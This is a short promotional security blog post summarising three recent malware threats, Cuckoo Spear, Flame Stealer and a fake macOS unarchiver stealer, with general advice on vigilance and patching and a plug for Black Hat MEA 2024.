Three new malware variants on the attack

New malware variants hit the threat landscape all the time. Malware authors continuously modify code in order to avoid detection, and develop variants that can exploit security vulnerabilities before they’re patched.

Innovations in malware are also developed to exploit new technologies and platforms; and to improve the capabilities of existing malware with enhanced functionality, making variants that are increasingly sophisticated. 

Today’s malware is often designed on a modular architecture, which means developers can easily switch, add, or modify components – without having to rework the entire architecture. This means that new variants (with more advanced or more targeted capabilities) can emerge very quickly. 

And the availability of automated tools for creating and deploying malware is accelerating the generation of new threats – creating a landscape that is increasingly difficult for cybersecurity firms to monitor. 

Here are three new malware variants causing disruption for victims right now. 

1. Cuckoo Spear

Researchers at Cybereason have uncovered Cuckoo Spear, a threat actor linked with the APT10 group. Stealthy operations appear to have been underway for up to three years – with an advanced persistent threat (APT) that conducts cyber espionage. 

Cuckoo Spear is a new collective term for LODEINFO and NOOPDOOR which have been found to be connected. Cuckoo Spear leverages both of these malware variants for persistent network infiltration and data exfiltration. 

Cybereason’s team have explored the sophisticated capabilities of Cuckoo Spear, which include decryption mechanisms, modular architecture, and DGA-based C2 communication. 

2. Flame Stealer 

Flame Stealer, first uncovered in April 2024, is a comprehensive data thief – with the capabilities to steal a range of sensitive data. A tweet by ThreatMon notes that it can capture login information, passwords, credit card details, and PayPal information; and it claims to be undetectable by antivirus tools.

It then instantly transmits stolen data to a specific Telegram channel or webhook. Once it has infected a system, it remains active via automatic re-injection. 

Importantly, it’s been found to target a number of popular digital platforms, including Spotify, Instagram, TikTok, and Discord. So it poses a significant risk for a high volume of users. 

And it’s also capable of stealing digital wallet data and capturing Two-Factor Authentication codes when a user enters them, further compromising users’ security online. 

3. MacOS malware disguised as an Unarchiver app

Unarchiver apps are used all the time, and digital users trust them as a means to extract archived files. But this trust can be abused by threat actors who plant malware into unarchiver downloads. 

Security analysts at Hunt.io recently discovered a phishing site disguised as a popular unarchiver app – with only a slightly modified domain name and download button to set the fake unarchiver site apart from the real one. 

A grabber zip file was found to contain 10 shell scripts with the purpose of stealing using data. The first script sets up a directory in the user’s library folder, collects IP information, and then executes the other data-grabbing scripts; before transmitting compressed, stolen data to a remote server. 

Users must be vigilant and implement security updates 

As we continue to see new malware threats emerge on the threat landscape globally, it’s critical that all digital users have access to actionable cybersecurity education. They need to know what to look for – so they can stay vigilant. 

At the same time, software updates should be installed routinely to avoid leaving vulnerabilities unpatched. 

Join us at Black Hat MEA 2024 to discover the latest in malware research and threat detection. You’ll learn from the leading experts in cybersecurity – and gain the knowledge and tools you need to protect your organisation.